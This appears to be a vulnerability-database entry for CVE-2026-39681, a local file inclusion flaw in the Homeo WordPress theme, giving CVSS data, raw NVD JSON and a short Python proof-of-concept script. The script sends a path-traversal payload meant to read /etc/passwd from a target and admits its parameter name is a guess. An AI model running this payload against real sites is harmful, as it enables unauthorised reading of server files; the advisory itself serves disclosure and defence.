Security Vulnerability Report
中文
CVE-2026-39681 CVSS 7.5 HIGH

CVE-2026-39681

Published: 2026-04-08 09:16:40
Last Modified: 2026-04-24 18:06:04

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ApusTheme Homeo homeo allows PHP Local File Inclusion.This issue affects Homeo: from n/a through <= 1.2.59.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Homeo <= 1.2.59

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_lfi(target_url): """ Proof of Concept for CVE-2026-39681 Tests for Local File Inclusion via vulnerable parameter. """ # Common vulnerable endpoint pattern (example) # The actual parameter name may vary based on theme implementation payload = "?page=../../../../../../../etc/passwd" try: response = requests.get(target_url + payload, timeout=10) if "root:x:0:0:" in response.text: print("[+] Vulnerability confirmed! /etc/passwd leaked.") return True else: print("[-] Vulnerability not confirmed or target patched.") return False except Exception as e: print(f"Error connecting to target: {e}") return False if __name__ == "__main__": url = "http://example.com/" # Replace with target URL check_lfi(url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39681", "sourceIdentifier": "[email protected]", "published": "2026-04-08T09:16:39.870", "lastModified": "2026-04-24T18:06:04.160", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in ApusTheme Homeo homeo allows PHP Local File Inclusion.This issue affects Homeo: from n/a through <= 1.2.59."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/homeo/vulnerability/wordpress-homeo-theme-1-2-59-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}